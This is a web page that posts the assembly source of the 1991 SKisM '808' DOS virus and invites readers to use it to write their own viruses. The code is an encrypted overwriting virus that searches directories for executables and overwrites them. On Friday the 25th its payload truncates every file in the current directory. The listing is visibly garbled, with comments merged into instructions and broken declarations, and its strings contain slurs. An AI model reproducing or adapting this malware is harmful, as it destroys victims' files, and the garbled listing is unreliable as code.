(Assembly source code) the 808 Virus


The 808 Virus

Here is another virus from SKisM. It's a quick overwriting virus, but you can use the source code to write your own viruses.

------------------------------------------------------------------------------
; The SKisM 808 Virus. Created 1991 by the Smart Kids into Sick Methods.
FileName EQU used to find file name
FileAttr EQU used to find file attributes
Filedate EQU used to find file date
FILETIME EQU used to find file time
Code_start EQU 0100h; start of all. COM files
Virus_size EQU 808 TR 808
Code segment ' Code '
Assume Cs:code,ds:code,es:code
ORG Code_start
Main proc Near
JMP Virus_start
Encrypt_val DB 00h
Virus_start:
Call encrypt; Encrypt/decrypt file
JMP virus go to start of code
Encrypt
Push CX
mov bx,offset Virus_code; start encryption at data
Xor_loop:
MOV ch,[bx]; Read current byte
XOR Ch,encrypt_val; Get encryption key
mov [bx],ch switch bytes
Inc BX; Move bx up a byte
CMP Bx,offset virus_code+virus_size
; Are we do with the encryption
Jle Xor_loop, no? Keep going
Pop CX
Ret
Infectfile:
mov dx,code_start where virus starts in memory
mov bx,handle; load BX with handle
Push BX; save handle on stack
Call encrypt; Encrypt file
Pop bx; get back BX
mov cx,virus_size number of bytes to write
mov ah,40h; write to File
int 21h;
Push BX
Call encrypt, fix up the mess
Pop bx
Ret
Virus_code:
Wildcards db "*", 0 search for directory argument
Filespec DB "*. EXE ", 0; Search for EXE file argument
FILESPEC2 db "*.*", 0
RootDir db "", 0; argument for root directory
Dirdata db DUP (?); holds directory DTA
Filedata db DUP (?); Holds files DTA
Diskdtaseg DW?; Holds disk DTA segment
Diskdtaofs DW?; Holds disk DTA offset
Tempofs DW?; holds offset
Tempseg DW?; holds segment
Drivecode DB?; holds drive code
Currentdir db DUP (?); Save current directory in this
Handle DW?; holds file handle
Orig_time DW?; Holds file time
Orig_date DW?; Holds file date
Orig_attr DW?; holds file attr
Idbuffer DW 2 dup (?); Holds virus ID
Virus
mov ax,3000h; get DOS version
int 21h;
CMP al,02h is it at least 2.00?
JB Bus1 won ' t infect less than 2.00
MOV ah,2ch;
int 21h;
MOV encrypt_val,dl save M_seconds to encrypt Val
; Theres mutations possible
SETDTA:
mov dx,offset dirdata; offset of where to hold new DTA
mov ah,1ah; set DTA address
int 21h;
Newdir:
mov ah,19h; get drive Code
int 21h;
mov dl,al; save Drivecode
Inc DL; add one to DL, because functions differ
mov ah,47h; get current directory
mov si, offset currentdir; buffer to save directory in
int 21h;
mov dx,offset rootdir; move dx to change to root directory
mov ah,3bh change directory to root
int 21h;
Scandirs:
mov cx,13h; include Hidden/ro Directorys
MOV dx, offset wildcards; look for ' * '
MOV Ah,4eh;
int 21h;
CMP ax,12h No.
Jne dirloop no dirs found? Bail out
BUS1:
JMP Bus
Dirloop:
mov ah,4fh; Find Next file
int 21h;
CMP ax,12h
Je bus dirs found and roll out
ChDir
mov dx,offset dirdata+filename;point DX to Fcb-filename
mov ah,3bh change Directory
int 21h;
mov ah,2fh; get current DTA address
int 21h;
mov [Diskdtaseg],es; save Old segment
mov [DISKDTAOFS],BX; save old offset
mov dx,offset filedata; offset of where to hold new DTA
mov ah,1ah; set DTA address
int 21h;
Scandir:
MOV cx,07h;
mov dx,offset filespec;p oint dx to "*.com", 0
MOV Ah,4eh;
int 21h;
CMP ax,12h. was file found?
Jne transform
Nextexe:
mov ah,4fh; Find Next file
int 21h;
CMP ax,12h None found
Jne transform found, what we can do
mov dx,offset rootdir; move dx to change to root directory
mov ah,3bh change directory to root
int 21h;
mov ah,1ah; set DTA address
mov ds,[diskdtaseg]; restore Old segment
mov dx,[diskdtaofs]; restore old offset
int 21h;
JMP Dirloop
Bus
JMP Rollout
Transform
mov ah,2fh; temporally store DTA
int 21h;
mov [Tempseg],es; save Old segment
mov [TEMPOFS],BX; save old offset
MOV dx, offset filedata + filename
mov bx,offset filedata, save File ...
MOV ax,[bx]+filedate;d ate
MOV orig_date,ax;
MOV ax,[bx]+filetime;
MOV orig_time,ax; and
MOV ax,[bx]+fileattr;
MOV ax,4300h
int 21h
MOV orig_attr,cx
mov ax,4301h; change attributes
XOR cx,cx Clear Attributes
int 21h;
MOV ax,3d00h open file-read
int 21h;
JC fixup; error-find another file
mov handle,ax; save handle
mov ah,3fh; read from file
MOV bx,handle move handle to BX
mov cx,02h read 2 bytes
mov dx,offset idbuffer; save to buffer
int 21h;
MOV Ah,3eh close file for now
mov bx,handle; load BX with handle
int 21h;
MOV bx, idbuffer, fill bx with ID string
CMP bx,02ebh; infected?
Jne doit; same-find another file
Fixup:
mov ah,1ah; set DTA address
mov ds,[tempseg]; restore Old segment
mov dx,[tempofs]; restore old offset
int 21h;
JMP Nextexe
Doit
MOV dx, offset filedata + filename
MOV ax,3d02h Open file Read/write access
int 21h;
mov handle,ax; save handle
Call Infectfile
; mov ax,3eh; close file
; int 21h
Rollout
mov ax,5701h; restore original
MOV bx,handle;
MOV cx,orig_time time and
MOV dx,orig_date;d ate
int 21h;
MOV ax,4301h restore original attributes
MOV cx,orig_attr
MOV dx,offset filedata + filename
int 21h
; MOV Bx,handle
; mov ax,3eh; close file
; int 21h
mov ah,3bh; try to fix this
mov dx,offset RootDir; for Speed
int 21h;
mov ah,3bh change Directory
mov dx,offset Currentdir; back to original
int 21h;
MOV ah,2ah Check system date
int 21h;
CMP cx,1991 is it at least 1991?
JB Audi; no? Don ' t does it now
CMP dl,25 is it the 25th?
JB Audi; not yet? Quit
CMP al,5 is Friday?
Jne Audi; no? Quit
mov dx,offset dirdata; offset of where to hold new DTA
mov ah,1ah; set DTA address
int 21h;
MOV Ah,4eh;
MOV cx,7h;
mov dx,offset filespec2; offset *.*
Loops:
int 21h;
JC Audi; Error? Then quit
MOV ax,4301h; find all normal files
XOR Cx,cx;
int 21h;
MOV dx,offset dirdata + filename
mov ah,3ch fuck up all files in current Dir
int 21h;
JC Audi; Error? Quit
mov ah,4fh; Find Next file
JMP loops;
Audi
MOV ax,4c00h
int 21h;
; The below is just text to pad out of the virus size to 808 bytes. Don ' t
; Just change the text and claim which is your creation.
Words_ db "SKisM Rythem Stack Virus-808. Smart Kids into Sick Methods ", 0
WORDS2 DB "Dont alter this code into your own strain, Faggit.", 0
WORDS3 db "Hr/sss nycity, this are the fifth of many, many more ...", 0
WORDS4 db "You Sissys ...", 0
Main ENDP
Code ends
End Main
